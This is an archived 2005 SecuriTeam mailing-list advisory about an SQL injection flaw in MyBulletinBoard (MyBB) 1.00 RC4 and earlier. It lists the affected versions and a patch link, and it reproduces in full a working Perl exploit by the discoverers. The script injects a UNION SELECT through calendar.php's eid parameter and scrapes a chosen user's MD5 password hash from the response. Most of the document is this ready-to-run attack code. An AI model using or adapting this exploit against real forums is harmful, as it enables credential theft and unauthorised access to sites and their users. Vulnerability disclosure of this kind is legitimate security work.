[EXPL] MyBulletinBoard(MyBB) SQL Injection (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 06/02/05
- Previous message: SecuriTeam: "[TOOL] OllyDbg Heap Vis"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 Jun 2005 17:16:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MyBulletinBoard(MyBB) SQL Injection (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.mybboard.com/> MyBB is "a powerful, efficient and free forum
package developed in PHP and MySQL. MyBB has been designed with the end
users in mind, you and your subscribers. Full control over your discussion
system is presented right at the tip of your fingers, from multiple styles
and themes to the ultimate customization of your forums using the template
system".
The following exploit will retrieve password HASH used by the MyBB system
for given user id.
DETAILS
Vulnerable Systems:
* MyBulletinBoard version 1.00RC4 and prior
Patch Availability:
<http://www.mybboard.com/community/attachment.php?aid=862>
http://www.mybboard.com/community/attachment.php?aid=862
#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182
use LWP::Simple;
print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";
if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\n Example:\nperl
$0 http://www.example.com/mybb/ 1\n";
exit(0);
}
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,".
"null,null,null,password,null%20FROM%20".
"mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print
"[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
ADDITIONAL INFORMATION
The information has been provided by FAiN182.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] OllyDbg Heap Vis"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
